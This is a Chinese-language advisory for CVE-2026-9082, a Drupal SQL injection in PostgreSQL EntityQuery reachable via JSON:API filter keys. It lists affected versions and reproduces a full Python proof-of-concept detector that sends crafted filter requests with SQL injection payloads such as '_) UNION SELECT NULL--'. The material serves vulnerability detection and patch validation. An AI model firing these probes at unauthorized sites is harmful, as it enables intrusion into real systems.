
Drupal是一个开源的使用PHP语言编写的开源内容管理框架(CMF)和内容管理系统(CMS),由 Dries Buytaert 于 2000 年创立。它以其高度的模块化架构和灵活性著称,提供了强大的内容类型定义、用户权限管理、工作流系统以及丰富的扩展生态。
Drupal 特别适合构建复杂的企业级网站、政府门户和大型社区平台,虽然学习曲线相对陡峭,但能够满足高度定制化的需求,被全球众多知名组织和机构所采用。
CVE-2026-9082是一个存在于Drupal核心的SQL注入漏洞,问题出在PostgreSQL的EntityQuery条件处理器中。漏洞根源在于Drupal在处理用户可控数据时,对数组键名被直接用于SQL占位符名称的构造,而未经过充分的安全过滤。当攻击者传入关联数组时,数组键名会被拼接到SQL语句中作为占位符名称的一部分,从而导致SQL注入。
该漏洞影响使用PostgreSQL数据库的Drupal站点,攻击者无需任何身份验证即可远程利用。成功利用该漏洞可能导致敏感数据泄露、权限提升,在特定配置下甚至可能实现远程代码执行。
CVE-2026-9082
Drupal 8.9.0 至 10.4.9
Drupal 10.5.0 至 10.5.9
Drupal 10.6.0 至 10.6.8
Drupal 11.0.0 至 11.1.9
Drupal 11.2.0 至 11.2.11
Drupal 11.3.0 至 11.3.9
利用条件:
1、数据库后端为PostgreSQL;
2、开启JSON:API(默认启用)
不受影响:MySQL、MariaDB、SQLite、SQL Server、Drupal7.xPOC:
https://github.com/dinosn/drupal-sa-core-2026-004-lab
#!/usr/bin/env python3
"""SA-CORE-2026-004 — Detection and validation PoC.
Drupal Entity Query SQL injection via attacker-controlled array keys in
JSON:API filter[] values. PostgreSQL-backed Drupal 8.0 - 11.3.9 (inclusive),
exploitable through any JSON:API or REST endpoint that funnels user-supplied
arrays into EntityQuery::condition() with an IN/NOT IN operator on a
case-insensitive field.
Usage examples
--------------
# Detect on a local lab (default settings, http://127.0.0.1:8080)
python3 poc.py
# Detect on a remote target
python3 poc.py --target https://staging.example.com
# Detect against a custom entity type / bundle / field
python3 poc.py --target https://app.example.com \\
--entity-type taxonomy_term --bundle tags --field name
# Bearer-token authenticated
python3 poc.py --target https://api.example.com --auth-bearer "$TOKEN"
# HTTP Basic auth
python3 poc.py --target https://staging.example.com --auth-basic admin:hunter2
# Cookie auth (paste SESS… cookie from your browser session)
python3 poc.py --target https://app.example.com --auth-cookie "SESSname=value"
# Custom JSON:API base path (some sites mount it elsewhere)
python3 poc.py --target https://app.example.com --jsonapi-base /api/v1/jsonapi
# Skip TLS verification (lab/staging cert)
python3 poc.py --target https://staging.example.com --insecure
# Full SQLi probe (slower, sends multiple payloads)
python3 poc.py --target https://staging.example.com --mode full
# Just check version + JSON:API reachability — no exploit attempt
python3 poc.py --target https://staging.example.com --mode reconnaissance
Output
------
Exit code:
0 — target appears patched OR JSON:API not reachable
1 — VULNERABLE: attacker-controlled key reached the WHERE clause
2 — usage / network / target error (couldn't determine)
JSON output (when --json):
{"verdict": "vulnerable|patched|inconclusive",
"evidence": [...],
"target": "...",
"version_hint": "..." }
Authorization & scope
---------------------
Authorized testing only. Default settings target localhost. Network egress
to remote targets requires explicit --target and confirms-explicit-consent
language in your engagement scope. The script does NOT chain to data
extraction by default — `--mode default` only probes whether the bug fires,
not whether the database is readable beyond access controls.
"""
from __future__ import annotations
import argparse
import base64
import json
import os
import ssl
import sys
import time
from dataclasses import dataclass, field, asdict
from typing import Optional, Iterable
from urllib.parse import urlencode, urlparse
import urllib.request
import urllib.error
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
DEFAULT_TARGET = "http://127.0.0.1:8080"
DEFAULT_JSONAPI_BASE = "/jsonapi"
DEFAULT_ENTITY_TYPE = "node"
DEFAULT_BUNDLE = "article"
DEFAULT_FIELD = "title"
USER_AGENT = "sa-core-2026-004-detector/1.0 (defensive research)"
TIMEOUT = 15
# A benign string-keyed marker. If it round-trips into the SQL stream the
# target is vulnerable. We pick something that's unmistakable in PG logs and
# couldn't possibly be a real placeholder name a developer would emit.
MARKER_KEY = "RAPTORMARKER42"
# Polished SQLi probe payloads. Each is designed to cause distinguishable
# behavior between vulnerable and patched targets — typically a 500 / 4xx
# from the DB layer with a PG-flavored error message, or an unmistakable
# delay if --mode full and timing-based detection is enabled.
SQLI_PROBES = [
# placeholder-name-break-out → triggers PG syntax error or pdo bind error
"_) AND 1=1--",
"_) UNION SELECT NULL--",
# exotic characters that PG identifier rules reject
"$$",
".$",
]
# ---------------------------------------------------------------------------
# Result data class
# ---------------------------------------------------------------------------
@dataclass
class Evidence:
stage: str
detail: str
status_code: Optional[int] = None
body_snippet: Optional[str] = None
@dataclass
class Result:
target: str
verdict: str = "inconclusive"
evidence: list[Evidence] = field(default_factory=list)
version_hint: Optional[str] = None
jsonapi_reachable: bool = False
entity_type_reachable: bool = False
def as_dict(self):
return {
"target": self.target,
"verdict": self.verdict,
"evidence": [asdict(e) for e in self.evidence],
"version_hint": self.version_hint,
"jsonapi_reachable": self.jsonapi_reachable,
"entity_type_reachable": self.entity_type_reachable,
}
# ---------------------------------------------------------------------------
# HTTP plumbing
# ---------------------------------------------------------------------------
class HttpClient:
def __init__(self, *, insecure=False, auth_basic=None, auth_bearer=None,
auth_cookie=None, extra_headers: Optional[dict] = None):
self.insecure = insecure
self.auth_basic = auth_basic
self.auth_bearer = auth_bearer
self.auth_cookie = auth_cookie
self.extra_headers = extra_headers or {}
if insecure:
self._ctx = ssl.create_default_context()
self._ctx.check_hostname = False
self._ctx.verify_mode = ssl.CERT_NONE
else:
self._ctx = None
def headers(self):
h = {
"User-Agent": USER_AGENT,
"Accept": "application/vnd.api+json,application/json,*/*",
}
if self.auth_basic:
tok = base64.b64encode(self.auth_basic.encode()).decode()
h["Authorization"] = f"Basic {tok}"
if self.auth_bearer:
h["Authorization"] = f"Bearer {self.auth_bearer}"
if self.auth_cookie:
h["Cookie"] = self.auth_cookie
h.update(self.extra_headers)
return h
def get(self, url: str, params: Optional[dict] = None,
timeout: int = TIMEOUT) -> tuple[Optional[int], str, dict]:
if params:
url = url + ("?" if "?" not in url else "&") + urlencode(params, doseq=True)
req = urllib.request.Request(url, headers=self.headers())
try:
with urllib.request.urlopen(req, timeout=timeout, context=self._ctx) as resp:
return resp.status, resp.read().decode("utf-8", errors="replace"), dict(resp.headers)
except urllib.error.HTTPError as e:
try:
body = e.read().decode("utf-8", errors="replace")
except Exception:
body = ""
return e.code, body, dict(e.headers)
except urllib.error.URLError as e:
return None, f"URL error: {e.reason}", {}
except (TimeoutError, ssl.SSLError) as e:
return None, f"{type(e).__name__}: {e}", {}
# ---------------------------------------------------------------------------
# Probes
# ---------------------------------------------------------------------------
def probe_version(client: HttpClient, base: str, result: Result) -> None:
"""Best-effort version detection."""
for path, marker in (
("/CHANGELOG.txt", "Drupal"),
("/core/CHANGELOG.txt", "Drupal"),
("/", "Drupal"),
):
status, body, _ = client.get(base + path)
if status == 200 and body and marker in body[:1000]:
head = body[:300]
# Find the first Drupal x.y.z mention
for line in head.splitlines():
if "Drupal " in line:
result.version_hint = line.strip()
break
else:
result.version_hint = head.strip().split("\n", 1)[0]
return
# /core/install.php sometimes leaks. Skip per safety — could trigger
# write-side endpoints on a misconfigured site.
def probe_jsonapi(client: HttpClient, base: str, jsonapi_base: str,
result: Result) -> bool:
"""Confirm JSON:API is reachable. Returns True if it is."""
url = base + jsonapi_base.rstrip("/")
status, body, _ = client.get(url)
if status == 200 and body and ("jsonapi" in body or '"data"' in body):
result.jsonapi_reachable = True
result.evidence.append(Evidence(
stage="jsonapi-discovery",
detail=f"JSON:API entrypoint reachable at {jsonapi_base}",
status_code=status,
))
return True
result.evidence.append(Evidence(
stage="jsonapi-discovery",
detail=f"JSON:API entrypoint NOT reachable at {jsonapi_base}",
status_code=status,
body_snippet=(body[:200] if body else None),
))
return False
def probe_entity_type(client: HttpClient, base: str, jsonapi_base: str,
entity_type: str, bundle: str, result: Result) -> bool:
"""Confirm the (entity_type, bundle) is publicly listable."""
url = base + jsonapi_base.rstrip("/") + f"/{entity_type}/{bundle}"
status, body, _ = client.get(url, {"page[limit]": "1"})
if status == 200:
result.entity_type_reachable = True
result.evidence.append(Evidence(
stage="entity-discovery",
detail=f"{entity_type}--{bundle} collection reachable",
status_code=status,
))
return True
result.evidence.append(Evidence(
stage="entity-discovery",
detail=f"{entity_type}--{bundle} not reachable",
status_code=status,
body_snippet=(body[:200] if body else None),
))
return False
def probe_baseline(client: HttpClient, base: str, jsonapi_base: str,
entity_type: str, bundle: str, field_name: str,
result: Result) -> bool:
"""Send a baseline numeric-key filter. Confirms filter path is alive."""
url = base + jsonapi_base.rstrip("/") + f"/{entity_type}/{bundle}"
status, body, _ = client.get(url, {
"filter[t][condition][path]": field_name,
"filter[t][condition][operator]": "IN",
"filter[t][condition][value][0]": "__sa_core_2026_004_baseline__",
"page[limit]": "1",
})
snippet = body[:200] if body else None
result.evidence.append(Evidence(
stage="filter-baseline",
detail=f"Baseline IN filter on '{field_name}' (numeric keys)",
status_code=status,
body_snippet=snippet,
))
# A 200 with no results, or a JSON:API 4xx with a "filter" error key, both
# confirm filter parsing reached EntityQuery. A connection error or 5xx
# before any reasonable response is bad.
return status is not None and status < 500
def probe_string_key(client: HttpClient, base: str, jsonapi_base: str,
entity_type: str, bundle: str, field_name: str,
marker: str, result: Result) -> tuple[Optional[int], str]:
"""
The smoking-gun probe. Send a filter where the value array uses a STRING
key. On a vulnerable target this key reaches the SQL stream verbatim.
On a patched target array_values() flattens it to integer 0 before reaching
translateCondition.
"""
url = base + jsonapi_base.rstrip("/") + f"/{entity_type}/{bundle}"
status, body, _ = client.get(url, {
"filter[t][condition][path]": field_name,
"filter[t][condition][operator]": "IN",
f"filter[t][condition][value][{marker}]": "x",
"page[limit]": "1",
})
snippet = body[:400] if body else None
result.evidence.append(Evidence(
stage="filter-string-key",
detail=(f"Filter with string-key '{marker}' — on a vulnerable target "
"this key appears verbatim in the SQL WHERE clause"),
status_code=status,
body_snippet=snippet,
))
return status, body or ""
def probe_sqli(client: HttpClient, base: str, jsonapi_base: str,
entity_type: str, bundle: str, field_name: str,
result: Result) -> bool:
"""
Send SQL-metachar payloads. On a vulnerable PG target these cause distinct
HTTP responses (500 with PG syntax errors) vs a patched target where
array_values() squashes the key to integer 0 and the SQL is well-formed.
"""
url = base + jsonapi_base.rstrip("/") + f"/{entity_type}/{bundle}"
anomalies = 0
for payload in SQLI_PROBES:
status, body, _ = client.get(url, {
"filter[t][condition][path]": field_name,
"filter[t][condition][operator]": "IN",
f"filter[t][condition][value][{payload}]": "x",
"page[limit]": "1",
})
snippet = body[:300] if body else None
is_anomaly = False
if status == 500:
is_anomaly = True
# PG error fingerprints in the body
if body and any(s in body for s in [
"PDOException", "SQLSTATE", "syntax error", "pgsql",
"DatabaseException", "PreparedStatement",
]):
is_anomaly = True
if is_anomaly:
anomalies += 1
result.evidence.append(Evidence(
stage="sqli-probe",
detail=f"Payload key={payload!r} → anomaly={is_anomaly}",
status_code=status,
body_snippet=snippet if is_anomaly else None,
))
return anomalies > 0
# ---------------------------------------------------------------------------
# Verdict logic
# ---------------------------------------------------------------------------
def determine_verdict(result: Result, string_key_status: Optional[int],
string_key_body: str, anomalies_found: bool,
mode: str) -> str:
"""
Decision logic — corrected after live testing against both vulnerable
(11.3.9) and patched (11.3.10 / locally array_values()-patched) targets.
The ONLY high-confidence over-the-wire vulnerable signal is an HTTP 500
response with `SQLSTATE` or `Invalid parameter number` in the body when
the probe key contains SQL metacharacters. On a patched target the same
probe returns HTTP 200 (array_values() flattens the key, SQL is well-formed
and runs cleanly returning empty/normal data).
- jsonapi/entity unreachable → inconclusive
- reconnaissance mode → inconclusive (didn't try to exploit)
- SQLSTATE/500 anomaly on metachar probe → vulnerable
- String-key probe returns 500 (no metachars, just a benign string key)
→ vulnerable (means PDO can't reconcile the bind, indicates the bug
fired even on a benign-looking key)
- All probes return 200, no anomaly → likely_patched
Earlier versions of this script defaulted to "likely-vulnerable" on
HTTP 200 — that was wrong, because patched targets ALSO return 200 (and
are the more common case). Corrected per gpt-5.5 verification 2026-05-20.
"""
if not result.jsonapi_reachable:
return "inconclusive"
if not result.entity_type_reachable:
return "inconclusive"
if mode == "reconnaissance":
return "inconclusive"
if anomalies_found:
return "vulnerable"
if string_key_status == 500:
return "vulnerable"
if string_key_status == 200:
# Patched target signature: probe accepted, no SQL error.
# In --mode default we don't send metachar probes, so this is just
# "looks patched" — caller should run --mode full for a stronger check.
if mode == "default":
return "likely_patched_run_mode_full_to_confirm"
return "likely_patched"
return "inconclusive"
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def build_parser():
p = argparse.ArgumentParser(
prog="poc.py",
description="SA-CORE-2026-004 detector / validator (Drupal Entity "
"Query SQL injection via JSON:API filter array keys).",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__.split("Usage examples")[1].split("Output")[0] if "Usage examples" in __doc__ else "",
)
p.add_argument("--target", default=DEFAULT_TARGET,
help=f"Base URL of the Drupal site (default: {DEFAULT_TARGET})")
p.add_argument("--jsonapi-base", default=DEFAULT_JSONAPI_BASE,
help=f"JSON:API root path (default: {DEFAULT_JSONAPI_BASE})")
p.add_argument("--entity-type", default=DEFAULT_ENTITY_TYPE,
help=f"Entity type (default: {DEFAULT_ENTITY_TYPE})")
p.add_argument("--bundle", default=DEFAULT_BUNDLE,
help=f"Bundle (default: {DEFAULT_BUNDLE})")
p.add_argument("--field", default=DEFAULT_FIELD,
help=f"Field name to filter on (must be case-INSENSITIVE; default: {DEFAULT_FIELD})")
p.add_argument("--marker", default=MARKER_KEY,
help=f"Benign string-key marker for the detect-mode probe (default: {MARKER_KEY})")
p.add_argument("--mode", choices=("reconnaissance", "default", "full"),
default="default",
help="reconnaissance = just probe reachability; default = baseline + string-key marker; full = also send SQLi probes")
p.add_argument("--auth-basic", help='HTTP Basic auth, "user:pass"')
p.add_argument("--auth-bearer", help="Bearer token (Authorization: Bearer ...)")
p.add_argument("--auth-cookie", help="Cookie header value (e.g. SESS...=...)")
p.add_argument("--header", action="append", default=[],
help='Extra header "Name: value" (repeatable)')
p.add_argument("--insecure", action="store_true",
help="Skip TLS certificate verification")
p.add_argument("--json", action="store_true",
help="Emit machine-readable JSON result on stdout")
p.add_argument("--quiet", "-q", action="store_true",
help="Suppress per-stage banners (only emit final verdict)")
return p
def print_banner(text: str, quiet: bool):
if quiet:
return
print()
print("=" * 78)
print(text)
print("=" * 78)
def main():
args = build_parser().parse_args()
target = args.target.rstrip("/")
extra_headers = {}
for h in args.header:
if ":" not in h:
print(f"--header expects 'Name: value', got {h!r}", file=sys.stderr)
sys.exit(2)
k, v = h.split(":", 1)
extra_headers[k.strip()] = v.strip()
client = HttpClient(
insecure=args.insecure,
auth_basic=args.auth_basic,
auth_bearer=args.auth_bearer,
auth_cookie=args.auth_cookie,
extra_headers=extra_headers,
)
result = Result(target=target)
print_banner("STAGE 1 — Discovery", args.quiet)
probe_version(client, target, result)
if result.version_hint and not args.quiet:
print(f" version hint: {result.version_hint}")
probe_jsonapi(client, target, args.jsonapi_base, result)
if not args.quiet:
print(f" jsonapi reachable: {result.jsonapi_reachable}")
if not result.jsonapi_reachable:
result.verdict = "inconclusive"
_emit(result, args)
return _exit_for_verdict(result.verdict)
probe_entity_type(client, target, args.jsonapi_base,
args.entity_type, args.bundle, result)
if not args.quiet:
print(f" entity collection reachable: {result.entity_type_reachable}")
if not result.entity_type_reachable:
result.verdict = "inconclusive"
_emit(result, args)
return _exit_for_verdict(result.verdict)
if args.mode == "reconnaissance":
result.verdict = "inconclusive"
_emit(result, args)
return _exit_for_verdict(result.verdict)
print_banner("STAGE 2 — Baseline filter (numeric keys, expected to be benign)", args.quiet)
probe_baseline(client, target, args.jsonapi_base,
args.entity_type, args.bundle, args.field, result)
print_banner("STAGE 3 — String-key probe (benign string key, vulnerable target may 500)", args.quiet)
sk_status, sk_body = probe_string_key(
client, target, args.jsonapi_base,
args.entity_type, args.bundle, args.field, args.marker, result,
)
if not args.quiet:
print(f" string-key probe HTTP {sk_status}")
if sk_status == 500:
print(" → HTTP 500 on a benign string key indicates the bind/SQL")
print(" mismatch fired. Strong vulnerable signal even without metachars.")
elif sk_status == 200:
print(" → HTTP 200 here is consistent with EITHER patched (array_values()")
print(" strips key) OR vulnerable (key reached SQL but as valid identifier).")
print(" Run --mode full to send SQL-metacharacter probes for a stronger check.")
anomalies_found = False
if args.mode == "full":
print_banner("STAGE 4 — SQL injection probes (PG metachar payloads)", args.quiet)
anomalies_found = probe_sqli(client, target, args.jsonapi_base,
args.entity_type, args.bundle,
args.field, result)
if not args.quiet:
print(f" anomalies detected: {anomalies_found}")
result.verdict = determine_verdict(result, sk_status, sk_body,
anomalies_found, args.mode)
print_banner(f"VERDICT: {result.verdict}", args.quiet)
if not args.quiet:
if result.verdict == "vulnerable":
print(" → SQLSTATE/HTTP-500 detected on metachar/string-key probe.")
print(" This is a DETECTOR, not a full data-extraction exploit. The bug")
print(" primitive (attacker-controlled key in SQL placeholder) is confirmed.")
elif result.verdict.startswith("likely_patched"):
print(" → No SQL errors on the metachar probes. Consistent with the")
print(" array_values() upstream fix being applied. Patched.")
elif result.verdict == "inconclusive":
print(" → JSON:API/entity not reachable or recon-only mode. Re-run with")
print(" --mode full and confirm --entity-type/--bundle/--field exist.")
_emit(result, args)
return _exit_for_verdict(result.verdict)
def _emit(result: Result, args):
if args.json:
print(json.dumps(result.as_dict(), indent=2))
def _exit_for_verdict(verdict: str):
# Exit codes:
# 0 — patched (or likely patched)
# 1 — vulnerable (confirmed SQLSTATE / HTTP 500 signature)
# 2 — inconclusive (jsonapi/entity not reachable, or recon mode)
if verdict == "vulnerable":
sys.exit(1)
if verdict.startswith("likely_patched"):
sys.exit(0)
sys.exit(2)
if __name__ == "__main__":
main()
https://www.drupal.org/sa-core-2026-004